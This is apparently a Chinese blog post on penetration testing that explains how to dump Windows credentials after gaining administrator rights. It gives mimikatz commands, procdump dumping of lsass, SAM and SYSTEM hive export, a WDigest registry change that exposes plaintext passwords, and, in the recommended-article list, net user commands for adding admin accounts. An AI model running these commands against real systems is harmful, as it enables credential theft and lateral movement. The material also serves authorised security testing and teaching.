windows密码获取

最新推荐文章于 2023-07-23 19:20:36 发布
最新推荐文章于 2023-07-23 19:20:36 发布
阅读量2.2k 收藏 8
点赞数
分类专栏: 内网渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/119207849
版权

概述

渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。

windows密码获取方法

最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。

mimikatz直接获取

直接将mimikatz 上传到目标服务器,执行相关命令。

命令

privilege::debug   //提升至debug权限
sekurlsa::logonpasswords  //抓取密码
procdump + mimikatz

命令

procdump64.exe -accepteula  -ma lsass.exe lsass.dmp

下载到本地,mimikatz执行

sekurlsa::minidump

sekurlsa::logonpasswords full
注册表获取密码
reg save hklm\sam sam.hiv

reg save hklm\system sys.hiv

mimikatz 解密

lsadump::sam /system:sys.hiv /sam:sam.hiv

然后使用在线网站进行破解

https://www.objectif-securite.ch/

这里其实就是将sam 文件通过导出文件,然后解析。

mimikatz 直接获取sam 文件内的hash。

log res.txt

privilege::debug

token::elevate

lsadump::sam
注意事项

当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
参考

https://www.objectif-securite.ch/ophcrack
https://blog.csdn.net/Adminxe/article/details/105926959
https://blog.csdn.net/w1590191166/article/details/107350200
https://cloud.tencent.com/developer/article/1684021
https://zhuanlan.zhihu.com/p/58875844
https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/
https://www.secrss.com/articles/24903
https://www.jianshu.com/p/801ef84321ab
https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983/topic/5afbf818753289354cab7e3c

烟雨醉沉浮
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取windows 密码的工具
06-23
这种类型的工具通常被系统管理员或者技术支持人员用来在忘记密码或需要重置用户密码的情况下进行操作,但必须强调的是,任何未经授权的密码获取都可能违反法律法规,因此必须合法并合规地使用。 描述中提到的“在...
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
m0_62207170的博客
05-12 1515
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
windows认证&密码抓取
qq_44657899的博客
07-15 6100
文章目录基础知识windows版本历史一、工作组部分密码存放在哪里?NTML Hashwindows本地认证windows网络认证NTML v1与v2二、域部分kerbero协议白银票据黄金票据windows密码导出lsass进程抓取mimikatz直接操作lsass进程procdump+mimikatzWindows Server 2016抓取明文密码sam文件(密文,需要破解,或者通过hash传递使用)用工具读取sam文件注册表导出sam文件使用mimipenguin获取linux明文登录密码windo
windows忘了密码以及后渗透读取密码
帅醉了的博客
03-31 342
windows内存读取 使用quarkspwdump也可有获得 使用mimikatz也可以破解 privilege::debug sekurlsa::logonpasswords 拿到hash并且给出了密码
Windows密码凭证获取学习
crowsec
08-08 4420
一般来说,在我们获取Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
查看Windows凭据和普通凭据的密码(查看Windows中存储的密码)——mimikatz
热门推荐
一碗单炒饭的专栏
02-10 5万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
windows WIfi密码获取
05-14
基于Autohotkey的win10 wifi密码获取器,一件获取WiFi密码,自用脚本编写,无毒绿色开源软件,放心食用
Windows开机账户与密码获取工具
11-23
"Windows开机账户与密码获取工具"是一个专门用于获取Windows系统开机账户和密码的工具。它可以帮助管理员或者安全专家收集系统的登录信息,以便更好地理解和保护网络安全。该工具特别强调了其简易的操作流程,使得非...
Windows密码恢复工具
04-26
Windows密码恢复工具详解》 在日常操作中,我们可能会遇到一种尴尬的情况——忘记Windows系统的登录密码,导致无法正常进入操作系统。此时,Windows密码恢复工具就显得尤为重要。本文将详细介绍这款名为“Windows...
电脑开机密码获取工具
10-27
开机密码获取工具
3种获取获取电脑用户的密码的方法
10-09
3种获取获取电脑用户的密码的方法。方法一、 1、重新启动计算机,在启动画面出现后马上按下F8键,选择“带命令行的安全模式”。 2、运行过程结束时,系统列出了系统超级用户“administrator”和本地用户“zhangbq”的选择菜单,鼠标单击“administrator”,进入命令行模式。 3、键入命令:“net user zhangbq 123456 /add”,强制将“zhangbq”用户的口令更改为“123456”。若想在此添加一新用户(如:用户名为abcdef,口令为123456)的话,请键入“net user abcdef 123456 /add”,添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户,并使其具有超级权限。 4、重新启动计算机,选择正常模式下运行,就可以用更改后的口令“123456”登录“zhangbq”用户了。
获得Window系统所有用户密码
11-21
VC源码获得WINDOWS系统所有的用户密码:VC++ 6.0编译/Admin权限执行。 能够获得WINDOWS系统所有的用户密码,还包含 MFC CListCtrl 界面自定义工具类。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 1970
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
笔记篇 忘记windows密码怎么办,教你五招
ExtraordinaryStarlab的博客
06-09 2万+
方法一 在开机时,按下F8进入”带命令提示符的安全”模式 输入”NET USER+用户名+123456/ADD”可把某用户的密码强行设置为”123456″ 方法二 如用户忘记登入密码可按下列方法解决 1.在计算机启动时按〔F8〕及选〔Safe Mode With Command Prompt〕 2.选〔Administrator〕后便会跳出〔Command Prompt〕的窗口 3.用〔Net〕的命令增加一个用户,例:增加一个用户名为alanhkg888,命令语法如下: net user alanhkg88
Windows获取密码及hash
LuckySec
05-04 3319
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
Kali Linux渗透测试 045 读取windows本地密码
kevinhanser
03-01 2607
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. 抓包嗅探 2. 键盘记录本地密码 3. 查看本地缓存密码 4. WCE (WINDOWS CREDENTIAL EDITOR) 5. fgdump 6. mimikatz
Windows明文密码获取
xiangshen1990的博客
03-14 3248
Windows明文密码获取1:简介2:前提3:无安全软件3.1:在线获取3.2:离线获取4:针对symantec为代表的各种EDR抓取4.1:思路4.2:实现后记 1:简介 作者为网络安全从业者,专注红蓝对抗、本文尝试通过框架性梳理的方式来整理一些细致的知识点,将它们串联起来方便记忆。 本文将探讨如下几个方面的内容: 1:无安全软件情况下获取windows明文密码的方法。 2:针对symantec...
【转】获取Windows系统明文密码神器
weixin_34041003的博客
08-15 520
前序 电脑密码忘记了可以用本工具找回,前提是你能进入系统,例如本机保存了远程服务器登录的密码或借别人的电脑,而忘记了密码;mimikatz 2.0工具正好解决了你的问题。 工具下载 binaires : https://github.com/gentilkiwi/mimikatz/releases/latest baiduyun : http://pan.baidu.com/s/1i38m7...
windows密码获取器.exe
最新发布
01-28
Windows密码获取器.exe是一种可以帮助用户获取丢失或忘记的Windows系统密码的软件工具。它可以用于恢复本地用户帐户密码,也可以用于重置Windows管理员密码或其他用户密码。在某些情况下,用户可能会忘记自己的登录...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值